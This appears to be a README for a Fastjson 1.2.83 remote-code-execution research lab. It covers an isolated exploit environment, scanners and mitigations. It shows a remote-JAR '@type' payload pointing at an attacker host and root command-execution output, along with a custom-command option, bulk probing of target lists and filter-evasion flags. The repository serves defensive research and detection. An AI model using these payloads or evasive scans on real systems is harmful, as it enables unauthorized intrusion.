This repository now preserves two distinct Fastjson research tracks:
modern-fd/is the recommended, marker-only reconstruction of the Fastjson 1.2.83 single-body remote-JAR/file-descriptor chain on Spring Boot 3, normal embedded Tomcat and JDK 17. It uses the literal fixed-DTO sinkJSON.parseObject(body, BoundEnvelope.class)with AutoType disabled.- The original top-level Docker Compose lab preserves the earlier JDK 8 direct remote-class route. It is command-capable and should be treated as a legacy, isolated proof rather than the modern-JDK method.
scanner/contains passive request/log detection, static artifact inventory and a non-executing reachability probe.
The bug:
ParserConfig.checkAutoTypeprobes every@typevalue for the@JSONTypeannotation by doinggetResourceAsStream(typeName.replace('.','/') + ".class"). On modern Linux/JDK combinations, a remotejar:httpprobe can leave the JAR cached behind an open descriptor; laterjar:file:/proc/self/fd/Nprobes in the same body can reopen it under valid class names and initialize an annotated class. The exact 1.2.83 composition works with AutoType disabled and through a fixed DTO containingList<Object>. Binding alone is therefore not a mitigation. Full walk-through:docs/MECHANISM.md.
The companion whole-project review covered 2,041 callable/static-initializer rows across all 193 Fastjson 1.2.83 production Java files. The table below prioritizes the highest-impact results; it is not a claim that every Fastjson deployment is affected. This repository directly reproduces F105. The remaining entries summarize separately sealed source review and bounded lab evidence.
| Priority | Finding | Proven result | Important boundary |
|---|---|---|---|
| 1 | F105 — remote @JSONType bytecode execution |
Attacker-supplied class initialization through compatible Spring Boot loaders, including the JDK 8 direct route and the Linux/JDK 17 retained-JAR /proc/self/fd/N continuation |
Requires a parser-reachable @type carrier, compatible Boot/TCCL loader, egress, SafeMode/IgnoreAutoType off, and an exact attacker JAR. The modern fixed-DTO route additionally needs a generic value lane (the lab uses List<Object>), Linux procfs, a retained descriptor and exact name alignment; not universal across every JDK, loader, or OS |
| 2 | F1/F45 — TemplatesImpl command execution | Marker command execution through the fixed-DTO API, including an ignored body property | Requires weakened server policy: class admission, AutoType, and private-field population or equivalent paths; pristine defaults block it |
| 3 | F70/C016 — unbounded buffering and GZIP expansion | Typed byte/InputStream and annotated DTO paths expand or buffer without an output cap; constrained-heap Java OOME was reproduced | Endpoint/schema and attacker-byte reachability are required; production-wide outage was not established |
| 4 | F18/C089 — parser-thread stack exhaustion | Deeply nested ordinary object values can produce StackOverflowError under default parsing |
Request-thread availability impact; not an invariant JVM or service-wide crash |
| 5 | F120/C162 — fixed-schema HTTP SSRF/local-resource loading | Body-controlled JEditorPane/JTextPane.page performs HTTP requests and can load bounded file: content into Document state |
Requires the application to declare the Swing type; no automatic response exfiltration or RCE was proven |
| 6 | F118/C160 — hash-collision authorization/data-integrity failure | A distinct Unicode FNV-1a-64 collision can bind to a privileged enum constant or route JSONPath mutation to the wrong bean setter | Requires a usable collision and downstream trust or an exposed JSONPath mutation operation; no class admission or RCE |
| 7 | F121/C163 — fixed JdbcRowSet JNDI reachability | Exact setter order caused one body-selected outbound JNDI/LDAP connection | Evidence stops at a connection: no naming response, object factory, bytecode loading, or RCE |
| 8 | F2/F45 — default DNS resolution | Attacker-controlled hostname resolution works under default configuration and through an ignored fixed-DTO property | DNS/OOB interaction only, not generic HTTP SSRF or RCE |
See findings/FINDINGS.md for validation labels,
prerequisites, lower-tier findings, remediation priorities, and explicit negative
boundaries.
This repository is for education, defensive research, and authorized testing of systems
you own or are explicitly permitted to test. Host publication, when supported for the
modern lab's internal network, is requested on 127.0.0.1 only; its scripts drive the
test entirely inside that isolated network. The modern lab has no process-execution
primitive and sets only a fixed in-JVM marker.
The legacy JDK 8 lab does execute id and writes its output to /tmp/PWNED; keep it
isolated. Do not point the legacy exploit or active probe at unauthorized systems.
The scanner/ directory ships four dependency-free Python 3 tools (no pip
installs).
fjdetect.py— passively inspect decoded JSON request bodies or structured JSON logs for remote-JAR seeds and/proc/self/fdor/dev/fdsequences.fjscan_static.py— inventory jars/wars/ears for the vulnerable combination (content-backed, metadata-verified 1.2.83 × actual Spring Boot loader class content). Probe-bearing 1.2.48–1.2.82 releases and metadata/filename-only candidates are reported separately for review. CI-gate friendly (exit 2 onEXPOSED).fjscan_probe.py— active, safe reachability check: fires the@typeat a canary you control (built-in listener or Burp Collaborator / interactsh) and correlates the resource-fetch callback. Its built-in listener returns an empty 404; configure external listeners equivalently. A callback does not prove class loading or RCE.fjpayload.py— generate remote-resource fetch bodies for manual testing; use only an empty/404 listener when execution is not intended.
# 1) passive request/log inspection
python3 scanner/fjdetect.py --ndjson gateway.jsonl
# 2) inventory build artifacts / unpacked images (parallel)
python3 scanner/fjscan_static.py /path/to/artifacts --threads 16
# 3) active probe across many domains — simplest: --auto fires baseline + plain + escaped comparison
# DNS probes per target and prints a rollup; DNS callbacks land in your Burp Collaborator
python3 scanner/fjscan_probe.py --collaborator <sub>.oastify.com --auto --targets domains.txt --threads 50
cat domains.txt | python3 scanner/fjscan_probe.py --collaborator <sub>.oastify.com --auto --targets -
# 4) bulk fetch payloads for manual testing (one per domain, stable correlation token)
python3 scanner/fjpayload.py <collab-or-ip> --targets-file domains.txtdomains.txt = one target per line — a full [METHOD ]URL or a bare domain
(expanded with --scheme / --target-port / --path); # comments allowed:
api.internal.example
POST https://svc.example/v1/ingest
10.0.0.7:8080
fjscan_probe.py (active probe)
| Flag | Default | Purpose |
|---|---|---|
--auto |
off | simplest — per target send baseline + plain + Unicode-escaped comparison DNS probe, print a rollup; just needs --collaborator + --targets |
--canary-ip <ip> |
— | built-in listener mode; IP of this host as targets see it |
--collaborator <v> |
— | external OOB (IPv4 / int / dot-free host / Collaborator subdomain) |
--probe-type <t> |
jsontype |
manual mode: jsontype = remote-resource fetch path (jar:http int-IP); dns = Inet4Address OOB via a dotted host (Collaborator-compatible); both |
--targets <file|-> |
— | nonempty target list; - reads stdin (required); empty/comment-only input exits nonzero |
--threads N |
20 |
concurrent request workers |
--header 'K: V' |
— | extra request header (repeatable); a browser-like --user-agent is sent by default for a representative frontend request |
--baseline '{"a":1}' |
— | also send a benign control body per target; a baseline/probe response differential is consistent with content-sensitive edge, middleware, or application handling and needs corroboration |
--max-redirects N |
3 |
follow up to N exact-origin redirects or standard same-host HTTP:80→HTTPS:443 upgrades (0 = none); HTTPS downgrade, arbitrary port/origin changes, and cross-host redirects are blocked; upgrades retain only base non-secret headers |
--evasion {ukey,uval,both} |
none |
\uXXXX-escape the @type key / class value (fastjson still decodes it); an evasion-only callback is consistent with decoded probe data passing a literal-keyword filter, but still requires parser/version corroboration |
--scheme / --target-port / --path |
http / — / /parse |
how bare domains are expanded |
--method |
POST |
default HTTP method |
--wrap '{"u":{{P}}}' |
{{P}} |
nest the probe object inside a field |
--listen-port / --port |
19000 / 80 |
built-in canary port / collaborator port |
--wait / --timeout |
10 / 8 |
seconds to wait for callbacks / per-request timeout |
fjscan_static.py (inventory): <paths…> · --threads N (default 8) · --json
(machine output; exit code 2 if any EXPOSED).
fjpayload.py (generator): <collaborator> · --targets-file/-f <file\|-> (bulk) ·
--port · --token · --wrap · --entry.
Collaborator note: the
@JSONTypejar:sink doestypeName.replace('.','/'), so every dot in the host becomes a slash — a dotted Burp Collaborator subdomain (abc.oastify.com) can't be delivered through it (the tools fall back to an integer IP + URL path token). To get a callback into a public Collaborator, use--probe-type dns: thejava.net.Inet4Addressprimitive accepts a dotted host and fires a DNS interaction (<tok>.<sub>.oastify.com), confirming theInet4Addressparse primitive + egress. That is prerequisite evidence, not proof of the remote-JAR/FD terminal. Seescanner/README.md.
Requirements: Docker + Docker Compose, and outbound access to Maven Central on the first build (to fetch fastjson / spring-boot-loader / asm).
cd modern-fd
./scripts/static-safety-check.sh
./scripts/run-positive.sh
./scripts/run-controls.shThe positive case sends one body to a normal embedded-Tomcat request thread. Its
literal sink is final BoundEnvelope parsed = JSON.parseObject(body, BoundEnvelope.class). Success is only the fixed property and log token
FASTJSON_MODERN_FD_MARKER=fastjson-modern-fd-marker-v1; the response still
returns a normally bound BoundEnvelope. The evidence directory contains the
request, response, container metadata, logs and SHA-256 manifest.
Controls cover ordinary JSON, FD candidates without a seed, a seed followed by
impossible descriptors, and SafeMode. See modern-fd/README.md.
The FearsOff disclosure shows the same retained-JAR terminal on JDK 21 using a process-persistent cache and one FD candidate per request. This repository's modern lab instead reproduces a single-body JDK 17 composition: the failure-soft seed and bounded FD candidates are carried by one fixed-DTO request. JDK 21 remains externally reported; it is not a runtime result produced here.
The original top-level Compose project remains available for reproducing the
older one-stage route. Unlike modern-fd/, it is command-capable and should be
run only in the isolated lab:
make up
make exploit
make downExpected make exploit output:
[*] payload : {"@type":"jar:http:..attacker:8000.probe!.POC","x":1}
[*] response: {"ok":false,"error":"ClassCastException"} <- RCE already fired, THEN the cast
[*] PROOF — command output captured inside the TARGET container (/tmp/PWNED):
------------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
RCE_via_fastjson_JSONType
------------------------------------------------------------------
The ClassCastException is the tell that binding is not a mitigation: the attacker class
runs its <clinit> during the @type probe, before fastjson tries to cast it to Dto.
- Direct-class lane only: changing
target/Dockerfileto JDK 17 blocks this legacy crafted-name definition and leaves a fetch. That result does not test or mitigate the separate/proc/self/fdcontinuation inmodern-fd/. - Prove it's not autoType: the target never calls
setAutoTypeSupport(true)— check the banner athttp://127.0.0.1:8080/. - Custom command:
PWN_CMD='touch /tmp/i_was_here' docker compose up -d --build attacker.
| Path | What |
|---|---|
modern-fd/ |
marker-only Boot 3/JDK 17 fixed-DTO FD-chain lab and decisive controls |
scanner/ |
passive payload/log detection, static inventory and non-executing reachability tools |
target/ |
legacy JDK 8 target using JSON.parseObject(body, Dto.class) under a manually selected Boot loader |
attacker/ |
legacy command-capable JDK 8 class generator and JAR server |
exploit/ |
legacy exploit.sh proof |
docs/MECHANISM.md |
annotated source walk-through |
findings/FINDINGS.md |
prioritized whole-project findings, prerequisites and remediation boundaries |
Enable -Dfastjson.parser.safeMode=true on the ordinary handler-free path or
use the vendor's com.alibaba:fastjson:1.2.83_noneautotype build where immediate
migration is not possible, and audit installed AutoTypeCheckHandlers. Restrict
JVM egress; migrate untrusted parsing away from Fastjson 1.x; alert on decoded
@type remote-JAR seeds and /proc/self/fd or /dev/fd candidates both within
one request and correlated across requests. DTO binding and JDK 9+ are not
complete mitigations for the modern composition.
- Original disclosure and technical post: Kirill Firsov (@k_firsov, FearsOff) —
FastJson 1.2.83 Remote Code Execution
(July 21, 2026). It discloses the same JDK 8 direct-class and modern retained-JAR
/proc/self/fdmechanisms reconstructed here. - Maintainer advisory: Alibaba — Security Advisory: Remote Code Execution in fastjson 1.2.68–1.2.83. It reports typed-API reachability plus verification across Spring Boot 2.x–4.x and JDK 8/11/17/21. Those wider version/runtime matrices are upstream-reported; this repository's runtime proof remains Fastjson 1.2.83 on the documented JDK 8 and JDK 17 lanes.
- Public proof-of-concept & the
@JSONType/ jar-URL-internal-name technique: @wouijvziqy — https://github.com/wouijvziqy/Fastjson-JsonType-RCE-PoC.attacker/Gen.javare-implements that technique for this lab. - Modern-JDK FD-chain reports: the
WeChat article and the earlier
detailed Cnyes report supplied the
retained-JAR
/proc/self/fdhypothesis. They were treated as external reports, not as independent runtime proof. - Public Linux FD implementation:
DmTomHL/fastjson-1.2.83-gadget-rce
narrowed the reconstruction gap. Its command-capable code was reviewed
statically and was not executed;
modern-fd/uses independently authored marker-only classes and a normal fixed-DTO Tomcat endpoint. - fastjson — https://github.com/alibaba/fastjson (see also
safeMode, and the autoType history behind CVE-2022-25845).
This lab and the scanner/ tooling package those findings into a reproducible testbed and
defensive checks. Not affiliated with or endorsed by the researchers above.